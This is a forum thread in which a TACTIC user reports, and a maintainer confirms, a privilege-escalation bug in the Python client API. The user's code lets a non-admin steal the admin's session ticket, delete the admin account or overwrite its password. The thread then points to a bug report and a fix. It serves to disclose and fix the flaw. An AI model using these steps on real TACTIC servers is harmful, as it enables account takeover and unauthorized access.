TACTIC Open Source
client api: accessing sthpw search types using non admin user - Printable Version

+- TACTIC Open Source (http://forum.southpawtech.com)
+-- Forum: TACTIC Open Source (http://forum.southpawtech.com/forumdisplay.php?fid=3)
+--- Forum: TACTIC Discussion (http://forum.southpawtech.com/forumdisplay.php?fid=4)
+--- Thread: client api: accessing sthpw search types using non admin user (/showthread.php?tid=249)



client api: accessing sthpw search types using non admin user - LazyLeopard - 11-17-2021

I am playing with the python client api at the moment. I have been able to get this sequence going.





Code:
import tactic_client_lib as tcl

server = tcl.TacticServerStub.get()  # login using non-admin user
server.check_access('project', {'code', 'new_project'}, 'allow')
# False

ticket = server.query('sthpw/ticket', filters=[('login', 'admin')], order_bys=['timestamp desc'], single=True]
server.set_ticket(ticket['ticket'])

server.check_access('project', {'code', 'new_project'}, 'allow')
# True


I am also able to query other `sthpw` search types including `sthpw/file` and `sthpw/snapshot`. All of which pound the db very heavily.

Actually, I can also don't need any special permissions to go ahead and delete the admin user

Code:
server.delete_sobject('sthpw/login?code=admin')


{'__search_key__': 'sthpw/login?code=admin',
'__search_type__': 'sthpw/login',
'code': 'admin',
'data': None,
'department': None,
'display_name': ', Admin',
'email': None,
'first_name': 'Admin',
'hourly_wage': None,
'id': 1,
'keywords': None,
'keywords_data': None,
'last_name': None,
'license_type': None,
'location': None,
'login': 'admin',
'login_attempt': None,
'login_groups': None,
'namespace': None,
'password': '$S$DCUJSVJNAiQgZrkG8WAGF0U7WkXge5RACaiIPXlQKd0rPZAc8bCg',
'phone_number': None,
'project_code': None,
's_status': None,
'snapshot': None,
'upn': 'admin'}

or directly update its password without any problem!

Code:
user = server.get_by_search_key('sthpw/login?code=user')
server.update('sthpw/login?code=admin', {'password': user['password']})


Is this intended behaviour?



What can I do to disable this?


RE: client api: accessing sthpw search types using non admin user - listy - 11-18-2021

1. Where are you running this code? From the script editor as admin ?
2. Print current login and ticket using api to make sure


RE: client api: accessing sthpw search types using non admin user - LazyLeopard - 11-18-2021

(11-18-2021, 10:10 AM)listy Wrote: 1. Where are you running this code? From the script editor as admin ?
2. Print current login and ticket using api to make sure
I am running this code from a python repl from my host against the docker 4.8.0 image.

I login using the get_ticket + set_ticket sequence.


RE: client api: accessing sthpw search types using non admin user - LazyLeopard - 11-19-2021

(11-18-2021, 04:58 PM)LazyLeopard Wrote:
(11-18-2021, 10:10 AM)listy Wrote: 1. Where are you running this code? From the script editor as admin ?
2. Print current login and ticket using api to make sure
I am running this code from a python repl from my host against the docker 4.8.0 image.

I login using the get_ticket + set_ticket sequence.


For your convenience:



test_tactic.py

Code:
#!/usr/bin/env python
# -*- coding: utf-8 -*-

from __future__ import print_function

import tactic_client_lib as tcl

stub = tcl.TacticServerStub.get(setup=False)
stub.set_server('localhost')
ticket = stub.get_ticket('tactic', 'tactic123')
stub.set_ticket(ticket)
print('\nAcquired tactic ticket', ticket)

project_codes = stub.eval("@GET(sthpw/project.code)")
print('Project codes:', project_codes)


print('\nAccess status for tactic:')
print('===========================')
for pc in project_codes:
    access = stub.check_access('project', {'code': pc}, 'allow')
    print('project {pc} is {noaccess}accessible'.format(
        pc=pc, noaccess='' if access else 'NOT '))


ticket = stub.query(
    'sthpw/ticket', filters=[('login', 'admin')], order_bys=['timestamp desc'],
    single=True)

print('\nAcquired ticket {ticket} for {login}!'.format(**ticket))
stub.set_ticket(ticket['ticket'])

print('\nAccess status for {login}:'.format(**ticket))
print('===========================')
for pc in project_codes:
    access = stub.check_access('project', {'code': pc}, 'allow')
    print('project {pc} is {noaccess}accessible'.format(
        pc=pc, noaccess='' if access else 'not '))


Windows CMD

Code:
(venv) D:\talha.ahmed\Workspace>python test_tactic.py

Acquired tactic ticket cbb9ad3e6aeca620192
Project codes: ['admin', 'episodic', 'important_project', 'new_project', 'sthpw']

Access status for tactic:
===========================
project admin is NOT accessible
project episodic is NOT accessible
project important_project is NOT accessible
project new_project is NOT accessible
project sthpw is NOT accessible

Acquired ticket 5cdf6ef2992669e88b2 for admin!

Access status for admin:
===========================
project admin is accessible
project episodic is accessible
project important_project is accessible
project new_project is accessible
project sthpw is accessible



RE: client api: accessing sthpw search types using non admin user - Diego - 11-22-2021

Hi LazyLeopard,
this is bad security bug!

I tracked it to src/pyasm/search/search.py
When api_mode is open (default) there is no check for access to some security critical tables

Could you open an Issue on github reporting the bug? I will make a PR to fix it...


RE: client api: accessing sthpw search types using non admin user - LazyLeopard - 11-23-2021

Bug Report Posted:

https://github.com/Southpaw-TACTIC/TACTIC/issues/1694


RE: client api: accessing sthpw search types using non admin user - Diego - 11-23-2021

Thanks LazyLeopard!
I submitted a PR to fix the bug. I will update the docker images whenever Remko merge it.

If you want to test it, it's an easy edit on src/pyasm/search/search.py

Cheers.